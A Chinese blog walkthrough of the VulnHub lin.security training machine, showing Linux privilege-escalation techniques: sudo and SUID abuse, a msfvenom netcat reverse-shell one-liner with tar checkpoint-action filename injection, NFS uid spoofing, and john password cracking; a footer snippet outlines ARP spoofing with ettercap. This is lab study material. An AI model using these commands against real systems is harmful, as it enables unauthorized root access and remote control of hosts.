lin.security_v1.0靶机

最新推荐文章于 2024-07-28 22:26:55 发布
最新推荐文章于 2024-07-28 22:26:55 发布
阅读量141 收藏
点赞数 3
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58786230/article/details/140755459
版权

一、靶机下载地址

https://download.vulnhub.com/linsecurity/lin.security_v1.0.ova

二、配置环境

1.配置ens33环境,打开虚拟机时按下shift键进入此界面

2.按e键进入,在末尾处找到ro,将他替换为rw sigine init=/bin/bash

3.按下ctrl+x键,进入以下界面

4.进入netplan目录修改里面的文件

cd /etc/netplan

5.vim修改,将红框处改为ens33

6.重启网卡,修改完后重启靶机即可发现ip地址

Ifconfig ens33 down
ifconfig ens33 up

三、sudo提权

1、主机发现

#使用命令
nmap 192.168.145.0/24 -sn | grep -B 2 '00:0C:29:75:DC:71'

2、SSH连接靶机、账号密码为bob:secret

# 使用命令
ssh bob@192.168.23.166

3、查看当前用户和权限

# 使用命令
# 查看当前用户
whoami
# 查看用户权限
id

4、查看内核版本信息

# 使用命令
# uname -r

5、输入sudo -l显示允许当前用户使用的命令

# 使用命令
# sudo -l

6、使用辅助网址、根据结果执行对应命令进行提权

# 辅助网址
# https://gtfobins.github.io/

ash:

# 使用命令
# sudo ash

awk:

# 使用命令
# sudo awk 'BEGIN {system("/bin/sh")}'

bash:

# 使用命令
# sudo bash

四、SUID提权

1、查看suid文件

# 使用命令
# find / -perm -u=s -type f 2>/dev/null

2、使用辅助网址、根据结果执行对应命令进行提权

# 辅助网址
# https://gtfobins.github.io/

taskset:

# 使用命令
# taskset 1 /bin/bash -p

五、计划任务提权

1、查看计划任务

# 使用命令
# cat /etc/crontab

2、生成payload

# 使用命令
# msfvenom -p cmd/unix/reverse_netcat lhost=192.168.145.146 lport=9999 R

# payload
mkfifo /tmp/gomlnf; nc 192.168.145.146 9999 0</tmp/gomlnf | /bin/sh >/tmp/gomlnf 2>&1; rm /tmp/gomlnf

3、靶机执行命令

# 使用命令
# echo "mkfifo /tmp/jeuhde; nc 192.168.145.146 9999 0</tmp/jeuhde | /bin/sh >/tmp/jeuhde 2>&1; rm /tmp/jeuhde" > shell.sh && chmod +x shell.sh

# echo > "--checkpoint-action=exec=sh shell.sh"

# echo > "--checkpoint=1"

# nc -lvnp 9999

发现没有成功反弹上

六、NFS提权

1、查看是否开启NFS

# 使用命令
# cat /etc/exports

2、查看可以访问的NFS目录

# 使用命令
# showmount -e 192.168.23.166

3、创建nfs目录并挂载

# 使用命令
# mkdir /tmp/nfs

4、挂载目录到/tmp/nfs

# 使用命令
# mount -o rw,vers=3 192.168.145.174:/home/peter /tmp/nfs

5、生成恶意文件,发现没有写入权限,创建一个gid为1005的用户组,然后创建peter账户,uid指定为1001,gid指定为1005

# 使用命令
# msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf

# 创建用户组
# groupadd -g 1005 peter
# 创建用户
# adduser peter -uid 1001 -gid 1005

6、切换到peter用户,再次生成恶意文件

# 使用命令
# su peter
# msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf

7、赋予shell.elf文件后执行,发现成功执行,但是没有提权

# 使用命令
# chmod +x shell.elf
# ./shell.elf

七、不安全配置

1、查看/etc/passwd文件、发现有一个有root权限的用户存在加密的密码

# 使用命令
# cat /etc/passwd

2、将密码写入1.txt文件中,利用john进行解密、得到密码为P@ssw0rd

# 使用命令
# vi 1.txt

# 使用john进行解密
# sudo john --wordlist=rockyou.txt 1.txt

3、登录insecurity用户、成功提权

# 使用命令
# su insecurity

果冻*果冻*
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DS_Store文件泄漏利用python脚本
06-22
在CTF比赛中,这样的脚本可以帮助参赛者快速收集证据,分析可能的漏洞,或者在靶机上模拟攻击者的行动。了解如何利用.DS_Store文件泄漏不仅可以提高安全防护能力,还能在竞赛中取得优势。因此,掌握这一技能对于提升...
crasher.tar(DC3靶机所需提权exp-2)
02-20
DC3靶机所需提权exp
vulnhub之lin.security_v1.0
li1136594919的博客
06-03 201
下载靶机的时候没看描述,开启靶机直接盲打。直接开局四部曲--开放端口扫描,开放端口服务扫描,nmap简单漏洞脚本扫描,发现nfs服务开启,立即showmount -e 看有哪些共享目录在kali创建temp目录把靶机共享目录挂载上去,进去啥有效信息也没得,也不能写入文件。然后退出一直找啊找啊也没找到,最终承认自己是个菜逼,到网上搜靶机的writeup才发现作者已经给了初始立足点,这是一台练习提权的靶机!!!!!!!初始立足点:bob/secret。
lin.security_v1.0靶机(提权)
zdd1453691081的博客
07-28 176
【代码】lin.security_v1.0靶机(提权)
[VulnHub靶机]Lin.Security_linux提权
qq_45927819的博客
03-15 2192
靶机描述 在in.security,我们希望开发一个Linux虚拟机,该虚拟机在编写本文时基于最新的Ubuntu发行版(18.04 LTS),但存在许多漏洞,这些漏洞使用户无法升级扎根在盒子上。旨在帮助理解某些内置应用程序和服务(如果配置错误)可能会被攻击者滥用。 首先,您可以使用以下凭据登录主机:bob / secret 下载地址:https://in.security/downloads/lin.security_v1.0.ova 靶机IP:192.168.56.106 直接ssh连接: ssh bob
lin.security_v1.0打靶渗透
最新发布
m0_65112983的博客
07-28 94
lin.security_v1.0打靶渗透
MyOA.rar_easy _myoa_myoa靶机_oa_ssh mysql 框架
09-24
【标题】"MyOA.rar_easy_myoa_myoa靶机_oa_ssh mysql 框架" 描述了一个基于SSH框架和MySQL数据库的在线办公(OA)系统,名为MyOA,并且它具有一个易于使用的前端界面——Easy UI。这个项目可能用于企业内部的自动化...
Metasploitable2-Linux.zip_believable
01-08
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。此文件是虚拟机镜像文件,可以直接在虚拟系统兼容的VMware,VirtualBox,和其他虚拟平台打开使用。...
CFS.zip_CFS-GA_cfs
09-21
**CFS加密算法详解** CFS(Chaffing and Winnowing)是一种基于混沌理论的文件加密算法,由Stanford大学的John L. Hennessy和David A. Patterson提出。该算法结合了“Chaffing”(添加混淆数据)和“Winnowing”...
exploit.tar(DC3靶机所需提权exp-1)
02-20
39772.zip
Vulnhub靶机系列:De-ICE: S1.120
01-09
文章目录靶机地址靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址 https://www.vulnhub.com/entry/de-ice-s1120,10/ 靶机设置 靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有...
新版PHPStudy可用sqli_labs 靶机.zip
03-01
在新版PHPStudy中可以使用的sqli_labs SQL注入靶机。 直接解压压缩包,然后把安装包放在WWW根目录下。 找到\phpstudy_pro\WWW\Sqli_Edited_Version-master\sqlilabs\sql-connections找到这个目录下的db-creds.inc ...
cms.rar,靶机的源码
07-03
【CMS靶机源码解析与相关知识点】 CMS(Content Management System,内容管理系统)是一种用于构建和管理网站的应用程序,它提供了便捷的用户界面,让非技术背景的人员也能轻松编辑和发布内容。在这个名为“cms.rar...
Vulnix.7z靶机
04-25
一个vulnhub上的靶机,因为网络原因,下载的特别慢,我下载好,上传上来,供大家学习。如果大家有更好的靶机,请私我。
t6AdmX_new靶机
08-03
t6AdmX_new靶机
hack me please靶机攻略.docx
10-19
"hack me please靶机攻略" 本资源为一份详细的靶机攻略文档,涵盖了从主机发现到获取 root 权限的整个过程。下面是从文档中提取的关键知识点: 一、主机发现 * 使用 nmap 工具进行主机发现和端口扫描,命令为:...
数字钼靶机MAMMOMAT Novation_Maintenance.pdf
06-09
【MAMMOMAT Novation 数字钼靶机维护知识】 MAMMOMAT Novation 是一款由西门子(Siemens AG)生产的数字钼靶机,主要用于乳腺X射线摄影检查,是医学影像诊断中的重要设备。本维护手册(Maintenance Instructions)...
Metasploitable2靶机漏洞_hanxu.doc
09-28
Metasploitable2靶机漏洞_hanxu.doc
kali为攻击机,ip地址为172.20.10.10 win10为靶机,ip地址为172.20.10.9 现在kali要使用ettercap的命令行实现arp欺骗,使靶机在访问www.nlc.cn时被劫持,直接跳转到172.20.10.10 请给出具体的操作步骤和命令行
05-22
以下是具体的操作步骤和命令行: 1. 首先,启动Kali Linux和Windows 10虚拟机,并确保它们位于同一网络段中。可以使用ifconfig命令检查Kali Linux的IP地址和netstat命令检查Windows 10的IP地址。 2. 打开终端,输入以下命令安装ettercap: ``` sudo apt-get update sudo apt-get install ettercap-graphical ``` 3. 打开ettercap,选择“Sniff”>“Unified sniffing”,选择网卡并单击“Start”开始嗅探。 4. 在ettercap中,选择“Hosts”>“Scan for hosts”扫描网络中的主机。检查靶机的IP地址是否正确显示。 5. 在ettercap中,选择“Hosts”>“Host list”查看网络中的主机列表。确保靶机和网关的MAC地址已成功获取。 6. 在ettercap中,选择“Hosts”>“Host to IP”,将靶机的IP地址输入到“Target 1”中,将网关的IP地址输入到“Target 2”中,然后单击“Add”. 7. 在ettercap中,选择“Mitm”>“ARP poisoning”,选择“Sniff remote connections”和“Sniff HTTP/HTTPS”,然后单击“OK”。这将开始arp欺骗攻击。 8. 现在,当靶机尝试访问www.nlc.cn时,所有流量都将被重定向到Kali Linux的IP地址172.20.10.10。可以使用以下命令查看重定向的流量: ``` sudo tcpdump -i <interface> -n -vvv ``` 其中<interface>应替换为您的网络接口名称。 9. 若要停止arp欺骗攻击,可以在ettercap中选择“Mitm”>“Stop mitm attack”。 请注意:ARP欺骗是一种非常危险的攻击方法,仅在合法和授权的测试环境中使用。在尝试进行任何安全测试之前,请确保您已获得适当的授权和许可。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值